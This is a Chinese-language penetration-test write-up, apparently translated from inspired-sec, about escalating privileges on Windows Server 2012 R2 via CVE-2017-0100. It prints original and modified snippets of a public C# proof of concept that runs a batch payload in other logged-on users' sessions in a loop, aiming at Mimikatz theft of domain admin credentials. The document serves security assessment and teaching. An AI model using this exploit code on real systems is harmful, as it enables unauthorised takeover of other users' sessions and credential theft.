Windows Server 2012 R2的提權過程解析

近期，我在進行一項安全評估的過程中遇到了一個麻煩。這是某個組織的一台遠程桌面伺服器，安裝的是Windows Server 2012 R2系統，但是我手中的用戶賬號許可權卻非常低。由於我此前也進行過大量的安全評估和測試，因此我清楚地知道如果我能夠將這個用戶賬號的許可權提升為伺服器的本地管理員，那麼我就可以使用Mimikatz（Windows密碼抓取神器）來竊取域名管理員的憑證數據了。

跟我一起進行這項安全審查任務的是我的同事

Chris Myers

，當時我們幾乎用盡了腦海中所能想到的一切方法，但是問題依舊沒有解決。但就在我們打算放棄的時候，CVE-2017-0100進入了我們的視線之中，而這個漏洞正好就是我們所需要的東西。從理論上來說，這個漏洞將允許我們利用任意用戶許可權並通過一個活動會話來在遠程桌面伺服器中執行payload。

這個漏洞的發現者以及PoC的提交者都是

James Forshaw

，PoC使用了會話標記和DCOM Activator並允許用戶通過其他已登錄的用戶會話來執行任意進程。在對原始的PoC代碼進行了分析之後，發現我們仍然需要根據自己目前所面對的情況對他提供的漏洞利用代碼進行修改。

（1）確定漏洞利用代碼所支持的payload類型，並修改payload的識別與執行方式。

下面給出的是原始代碼：

Console.WriteLine("Creating Process inSession {0}after 20secs", new_session_id);

Thread.Sleep(20000);

IHxHelpPaneServer server=(IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee",new_session_id));

Uri target =newUri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System),"notepad.exe"));

server.Execute(target.AbsoluteUri);

在進行了深入分析之後我們發現，代碼中最重要的一個目標參數是一個指向可執行文件的路徑地址，所以我們首先嘗試的是

Casey Smith

發布的payload:

Regsvr32.exe

。但是，我們仍然無法讓IHxHelpPaneServer伺服器的執行函數來接收我們所提供的參數。

因此，我們打算在本地磁碟中保存一個小型.bat文件，並放在一個所有用戶都可以正常訪問的路徑之下，即「C:TEMP」。下面是我們修改後的代碼：

Console.WriteLine("Creating Process inSession {0}after 20secs", new_session_id);

Thread.Sleep(20000);

IHxHelpPaneServer server=(IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee",new_session_id));

Uri target = newUri("C:\TEMP\testing.bat");

server.Execute(target.AbsoluteUri);

（2）在每一個會話中執行漏洞利用代碼。

原始的PoC代碼會收集主機中每一個會話的會話ID，但最終只會在一個會話中執行漏洞利用代碼。下面給出的是原始PoC代碼：

try

{

int current_session_id= Process.GetCurrentProcess().SessionId;

int new_session_id= 0;

Console.WriteLine("Waiting For a Target Session");

while (true)

{

IEnumerable sessions = GetSessionIds().Where(id => id!=current_session_id);

if (sessions.Count() > 0)

{

new_session_id = sessions.First();

break;

}

Thread.Sleep(1000);

}

}

僅僅是在第一個記錄下的會話中執行代碼還遠遠不夠，我們所面臨的情況要求我們能夠在任意用戶許可權和會話進程中執行代碼。為了實現這一目標，我們只需要在收集到的會話信息（IEnumerable對象sessions）中隨機抽取一個會話，然後用這個會話來執行我們的payload即可。由於隨機選擇的固有特性，你可能會遇到用同一用戶會話執行兩次代碼的情況，但考慮到時間有限，我們選擇接受這種情況。

下面給出的是我們修改後的代碼：

try

{

intcurrent_session_id = Process.GetCurrentProcess().SessionId;

int new_session_id= 0;

Console.WriteLine("Waiting For a Target Session");

while (true)

{

IEnumerable sessions = GetSessionIds().Where(id => id!=current_session_id);

if(sessions.Count() > 0)

{

Random rnd= new Random();

int r = rnd.Next(sessions.Count());

new_session_id = sessions.ElementAt(r);

break;

}

Thread.Sleep(1000);

}

}

（3）保證漏洞利用代碼可以持續運行，直到我們手動終止進程為止…

原始的漏洞利用代碼只會運行一次，運行完畢後便會自動退出。為了解決這個問題，我們只需要將IHxHelpPaneServer執行函數寫在一個while循環裡面就可以了。

下面給出的是原始代碼：

try

{

intcurrent_session_id = Process.GetCurrentProcess().SessionId;

int new_session_id= 0;

Console.WriteLine("Waiting For a Target Session");

while (true)

{

IEnumerable sessions = GetSessionIds().Where(id => id!=current_session_id);

if(sessions.Count() > 0)

{

new_session_id = sessions.First();

break;

}

Thread.Sleep(1000);

}

Console.WriteLine("Creating Process in Session {0}after20secs", new_session_id);

Thread.Sleep(20000);

IHxHelpPaneServerserver =(IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee",new_session_id));

Uri target =newUri(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System),"notepad.exe"));

server.Execute(target.AbsoluteUri);

}

catch (Exception ex)

{

Console.WriteLine(ex);

}

下面給出的是我們修改後的代碼：

try

{

intcurrent_session_id = Process.GetCurrentProcess().SessionId;

int new_session_id= 0;

Console.WriteLine("Waiting For a Target Session");

while (true)

{

IEnumerable sessions = GetSessionIds().Where(id => id!=current_session_id);

if(sessions.Count() > 0)

{

Random rnd= new Random();

int r =rnd.Next(sessions.Count());

new_session_id = sessions.ElementAt(r);

Console.WriteLine("Creating Process in Session {0}after20secs", new_session_id);

Thread.Sleep(20000);

IHxHelpPaneServer server =(IHxHelpPaneServer)Marshal.BindToMoniker(String.Format("session:{0}!new:8cec58ae-07a1-11d9-b15e-000d56bfe6ee",new_session_id));

Uri target= new Uri("C:\TEMP\testing.bat");

server.Execute(target.AbsoluteUri);

}

Thread.Sleep(60000);

}

}

catch (Exception ex)

{

Console.WriteLine(ex);

}

總結

雖然我們對代碼的修改可能不是很完善，但是我們通過對JamesForshaw所提供的PoC進行修改並實現了在WindowsServer 2012 R2上的提權。最終，我們成功地在遠程桌面伺服器中拿到了任意用戶許可權下的shell，而這種許可權也就意味著我們能夠將手中用戶賬號的許可權提升為域名管理員。

* 參考來源：inspired-sec， FB小編Alpha_h4ck編譯，轉載請註明來自FreeBuf.COM

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！

本站內容充實豐富，博大精深，小編精選每日熱門資訊，隨時更新，點擊「搶先收到最新資訊」瀏覽吧！

請您繼續閱讀更多來自 FreeBuf 的精彩文章: